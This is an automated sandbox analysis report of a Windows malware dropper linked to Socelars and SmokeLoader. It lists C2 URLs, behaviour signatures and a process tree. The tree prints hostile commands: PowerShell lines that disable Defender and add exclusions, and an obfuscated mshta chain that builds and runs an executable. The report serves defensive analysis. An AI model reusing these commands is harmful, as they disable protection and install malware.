Analysis

  • max time kernel
    13s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    26/12/2021, 18:41

General

  • Target

    2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe

  • Size

    4.4MB

  • MD5

    244f3fcae34a514dd3e78f3d4d72f92a

  • SHA1

    5ac41859cefd7ad0536b36c7e82f33e702514fe2

  • SHA256

    2992c4b00c678a438b0b935e09e0fd341a44c46fe0dd2f18621570f55133e4df

  • SHA512

    245ab74d77796452086c2874af05c7c1d51e7c552c47a655388575cb4add160b743082c4db84f35f2755b2caa78b9b4af2577f1785a4919308fefea20acdc53f

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 17 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 55 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
    "C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3116
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1992
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1036
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun0792bfe25c4e6f.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun0792bfe25c4e6f.exe
            Sun0792bfe25c4e6f.exe
            5⤵
            • Executes dropped EXE
            PID:2484
            • C:\Users\Admin\Pictures\Adobe Films\deolLfBLVWWZhjEXo3SGrkJn.exe
              "C:\Users\Admin\Pictures\Adobe Films\deolLfBLVWWZhjEXo3SGrkJn.exe"
              6⤵
                PID:4904
              • C:\Users\Admin\Pictures\Adobe Films\XGd9xmpEaEmn66nGdN1QTt5z.exe
                "C:\Users\Admin\Pictures\Adobe Films\XGd9xmpEaEmn66nGdN1QTt5z.exe"
                6⤵
                  PID:2972
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 664
                    7⤵
                    • Program crash
                    PID:5044
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 680
                    7⤵
                    • Program crash
                    PID:4456
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 640
                    7⤵
                    • Program crash
                    PID:4292
                • C:\Users\Admin\Pictures\Adobe Films\cdsFHRwWn8gYws59jYRHw9lb.exe
                  "C:\Users\Admin\Pictures\Adobe Films\cdsFHRwWn8gYws59jYRHw9lb.exe"
                  6⤵
                    PID:4196
                  • C:\Users\Admin\Pictures\Adobe Films\KFfotjwUdwi0GFVFsJeDM02T.exe
                    "C:\Users\Admin\Pictures\Adobe Films\KFfotjwUdwi0GFVFsJeDM02T.exe"
                    6⤵
                      PID:4856
                    • C:\Users\Admin\Pictures\Adobe Films\CtJuePy1MyQk4W0fAOB7rE5q.exe
                      "C:\Users\Admin\Pictures\Adobe Films\CtJuePy1MyQk4W0fAOB7rE5q.exe"
                      6⤵
                        PID:4288
                      • C:\Users\Admin\Pictures\Adobe Films\pOwxTgYu2mKTgRe1OiTr9Lwe.exe
                        "C:\Users\Admin\Pictures\Adobe Films\pOwxTgYu2mKTgRe1OiTr9Lwe.exe"
                        6⤵
                          PID:4872
                        • C:\Users\Admin\Pictures\Adobe Films\ePGhwMzZ7_bWKGTNIn7y9eom.exe
                          "C:\Users\Admin\Pictures\Adobe Films\ePGhwMzZ7_bWKGTNIn7y9eom.exe"
                          6⤵
                            PID:2000
                          • C:\Users\Admin\Pictures\Adobe Films\2oxIk_KXlBd8OExoW9Xyb3WX.exe
                            "C:\Users\Admin\Pictures\Adobe Films\2oxIk_KXlBd8OExoW9Xyb3WX.exe"
                            6⤵
                              PID:1272
                            • C:\Users\Admin\Pictures\Adobe Films\2xNJlMOtxbrck8lCJlXt9jJz.exe
                              "C:\Users\Admin\Pictures\Adobe Films\2xNJlMOtxbrck8lCJlXt9jJz.exe"
                              6⤵
                                PID:4340
                                • C:\Users\Admin\AppData\Local\Temp\7zS3DE6.tmp\Install.exe
                                  .\Install.exe
                                  7⤵
                                    PID:4988
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4A69.tmp\Install.exe
                                      .\Install.exe /S /site_id "525403"
                                      8⤵
                                        PID:4600
                                  • C:\Users\Admin\Pictures\Adobe Films\JHat5sZc4cNKfO1RLKKYD76t.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\JHat5sZc4cNKfO1RLKKYD76t.exe"
                                    6⤵
                                      PID:356
                                    • C:\Users\Admin\Pictures\Adobe Films\B1ltl3yLoT5Gb98yErXql8ci.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\B1ltl3yLoT5Gb98yErXql8ci.exe"
                                      6⤵
                                        PID:3884
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 400
                                          7⤵
                                          • Program crash
                                          PID:780
                                      • C:\Users\Admin\Pictures\Adobe Films\JlxTFx8xMVyRGqvfG0LjAsSf.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\JlxTFx8xMVyRGqvfG0LjAsSf.exe"
                                        6⤵
                                          PID:2196
                                        • C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"
                                          6⤵
                                            PID:2544
                                            • C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"
                                              7⤵
                                                PID:4172
                                            • C:\Users\Admin\Pictures\Adobe Films\HtWtgehaHrFRM6AXPyOi8Vk8.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\HtWtgehaHrFRM6AXPyOi8Vk8.exe"
                                              6⤵
                                                PID:3676
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun07426f49ca3.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3996
                                            • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07426f49ca3.exe
                                              Sun07426f49ca3.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2864
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun07853f394a6f2.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2844
                                            • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07853f394a6f2.exe
                                              Sun07853f394a6f2.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:952
                                              • C:\Users\Admin\Pictures\Adobe Films\g8Ea5sTtb4AGzNUcMWWY3LW0.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\g8Ea5sTtb4AGzNUcMWWY3LW0.exe"
                                                6⤵
                                                  PID:4728
                                                • C:\Users\Admin\Pictures\Adobe Films\DjVuFsS7eSS9aKu0hxkmYxkg.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\DjVuFsS7eSS9aKu0hxkmYxkg.exe"
                                                  6⤵
                                                    PID:4332
                                                  • C:\Users\Admin\Pictures\Adobe Films\el_JhtsjZqV8Ofskkum4sQdi.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\el_JhtsjZqV8Ofskkum4sQdi.exe"
                                                    6⤵
                                                      PID:4368
                                                    • C:\Users\Admin\Pictures\Adobe Films\ZASI6_un6Lp8XU0mwUdzNjXg.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\ZASI6_un6Lp8XU0mwUdzNjXg.exe"
                                                      6⤵
                                                        PID:1940
                                                      • C:\Users\Admin\Pictures\Adobe Films\FhCHvwomyjXLvMN3TwM0jkTH.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\FhCHvwomyjXLvMN3TwM0jkTH.exe"
                                                        6⤵
                                                          PID:4908
                                                        • C:\Users\Admin\Pictures\Adobe Films\aVPnkV6ppQ7Pi8SA7WzdfkQH.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\aVPnkV6ppQ7Pi8SA7WzdfkQH.exe"
                                                          6⤵
                                                            PID:512
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS37DB.tmp\Install.exe
                                                              .\Install.exe
                                                              7⤵
                                                                PID:1328
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS42E7.tmp\Install.exe
                                                                  .\Install.exe /S /site_id "525403"
                                                                  8⤵
                                                                    PID:4224
                                                              • C:\Users\Admin\Pictures\Adobe Films\ehrdrtNELSEtd7q0K66tgfEx.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\ehrdrtNELSEtd7q0K66tgfEx.exe"
                                                                6⤵
                                                                  PID:3172
                                                                • C:\Users\Admin\Pictures\Adobe Films\I4q4PPuyMW7UrYa77TghPnoq.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\I4q4PPuyMW7UrYa77TghPnoq.exe"
                                                                  6⤵
                                                                    PID:3844
                                                                  • C:\Users\Admin\Pictures\Adobe Films\i6WtrzMGtUVnlWaVNY_6JxIp.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\i6WtrzMGtUVnlWaVNY_6JxIp.exe"
                                                                    6⤵
                                                                      PID:2952
                                                                    • C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"
                                                                      6⤵
                                                                        PID:4840
                                                                        • C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"
                                                                          7⤵
                                                                            PID:4444
                                                                        • C:\Users\Admin\Pictures\Adobe Films\CZXdiaq2wabk2YWB6ciyYwto.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\CZXdiaq2wabk2YWB6ciyYwto.exe"
                                                                          6⤵
                                                                            PID:2456
                                                                          • C:\Users\Admin\Pictures\Adobe Films\eh27mwD6bMTOnrbkwIUtCklL.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\eh27mwD6bMTOnrbkwIUtCklL.exe"
                                                                            6⤵
                                                                              PID:4752
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Sun07689b7dd63a1a2e.exe
                                                                          4⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3220
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07689b7dd63a1a2e.exe
                                                                            Sun07689b7dd63a1a2e.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3672
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c Sun07aef696b81cc09ee.exe
                                                                          4⤵
                                                                            PID:3216
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07aef696b81cc09ee.exe
                                                                              Sun07aef696b81cc09ee.exe
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:1572
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c Sun07fbac34efb13666.exe
                                                                            4⤵
                                                                              PID:856
                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07fbac34efb13666.exe
                                                                                Sun07fbac34efb13666.exe
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:1632
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c Sun0705fdd6f3fa.exe /mixone
                                                                              4⤵
                                                                                PID:1124
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun0705fdd6f3fa.exe
                                                                                  Sun0705fdd6f3fa.exe /mixone
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3244
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 656
                                                                                    6⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Program crash
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4020
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 672
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3984
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 772
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:2004
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 808
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:3116
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 840
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4288
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 896
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4220
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1064
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4152
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1264
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4456
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1304
                                                                                    6⤵
                                                                                    • Program crash
                                                                                    PID:4400
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c Sun074812abe11c68090.exe
                                                                                4⤵
                                                                                  PID:408
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe
                                                                                    Sun074812abe11c68090.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3680
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-TLE4F.tmp\Sun074812abe11c68090.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-TLE4F.tmp\Sun074812abe11c68090.tmp" /SL5="$30134,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:2220
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe" /SILENT
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4016
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-55PUN.tmp\Sun074812abe11c68090.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-55PUN.tmp\Sun074812abe11c68090.tmp" /SL5="$50056,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe" /SILENT
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:1048
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c Sun076d6b9f10493573.exe
                                                                                  4⤵
                                                                                    PID:964
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun076d6b9f10493573.exe
                                                                                      Sun076d6b9f10493573.exe
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2596
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Sun074dcdeb3534e450.exe
                                                                                    4⤵
                                                                                      PID:2364
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074dcdeb3534e450.exe
                                                                                        Sun074dcdeb3534e450.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2192
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Sun079abff5ef.exe
                                                                                      4⤵
                                                                                        PID:1912
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun079abff5ef.exe
                                                                                          Sun079abff5ef.exe
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2584
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                            6⤵
                                                                                              PID:1272
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im chrome.exe
                                                                                                7⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:2900
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 1664
                                                                                              6⤵
                                                                                              • Program crash
                                                                                              PID:4568
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Sun07b9107c074617.exe
                                                                                          4⤵
                                                                                            PID:688
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe
                                                                                              Sun07b9107c074617.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2944
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX & IF """" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )
                                                                                                6⤵
                                                                                                  PID:1080
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX & IF "" =="" for %e iN ( "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe" ) do taskkill /f -im "%~nxe"
                                                                                                    7⤵
                                                                                                      PID:3388
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\nU82.eXE
                                                                                                        ..\NU82.ExE -pfpj1T6lr~GKuX
                                                                                                        8⤵
                                                                                                          PID:3812
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX & IF ""-pfpj1T6lr~GKuX "" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )
                                                                                                            9⤵
                                                                                                              PID:4208
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX & IF "-pfpj1T6lr~GKuX " =="" for %e iN ( "C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ) do taskkill /f -im "%~nxe"
                                                                                                                10⤵
                                                                                                                  PID:4928
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\System32\mshta.exe" vbscrIPT: CLOSE ( cREATeOBJecT ( "wSCRIpT.ShELl" ). run ( "cmd /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 & eChO | sET /p = ""MZ"" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S +2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz + NXKZ.hO + UX2~UVNN.vM2 ..\vFeGMw.qLW & DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW " , 0 , trUE ) )
                                                                                                                9⤵
                                                                                                                  PID:4616
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 & eChO | sET /p = "MZ" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S +2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz +NXKZ.hO +UX2~UVNN.vM2 ..\vFeGMw.qLW &DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW
                                                                                                                    10⤵
                                                                                                                      PID:1272
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eChO "
                                                                                                                        11⤵
                                                                                                                          PID:5108
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>4LNjycCw.Z2"
                                                                                                                          11⤵
                                                                                                                            PID:4908
                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                            msiexec.exe -y ..\vFEGMW.QlW
                                                                                                                            11⤵
                                                                                                                              PID:4724
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f -im "Sun07b9107c074617.exe"
                                                                                                                        8⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:4128
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1104 -s 588
                                                                                                                4⤵
                                                                                                                • Program crash
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3076
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                          1⤵
                                                                                                          • Process spawned unexpected child process
                                                                                                          PID:4180
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                            2⤵
                                                                                                              PID:4224
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                            1⤵
                                                                                                              PID:4424

                                                                                                            Network

                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • memory/304-297-0x0000022025C40000-0x0000022025CB2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/304-287-0x0000022025090000-0x0000022025092000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/304-288-0x0000022025090000-0x0000022025092000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/508-275-0x0000021AF43A0000-0x0000021AF43A2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/508-278-0x0000021AF4780000-0x0000021AF47F2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    456KB

                                                                                                                  • memory/508-273-0x0000021AF43A0000-0x0000021AF43A2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    8KB

                                                                                                                  • memory/508-274-0x0000021AF46C0000-0x0000021AF470D000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    308KB

                                                                                                                  • memory/736-243-0x0000000007470000-0x00000000074D6000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    408KB

                                                                                                                  • memory/736-264-0x0000000003090000-0x0000000003091000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/736-254-0x0000000008670000-0x00000000086BB000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    300KB

                                                                                                                  • memory/736-221-0x0000000007560000-0x0000000007B88000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    6.2MB

                                                                                                                  • memory/736-242-0x00000000073D0000-0x00000000073F2000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    136KB

                                                                                                                  • memory/736-206-0x0000000004950000-0x0000000004986000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    216KB

                                                                                                                  • memory/736-219-0x0000000004F00000-0x0000000004F01000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/736-179-0x0000000003090000-0x0000000003091000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/736-185-0x0000000003090000-0x0000000003091000-memory.dmp

                                                                                                                    Filesize

                                                                                                                    4KB

                                                                                                                  • memory/736-256-0x0000000008440000-0x00000000084B6000-memory.dmp

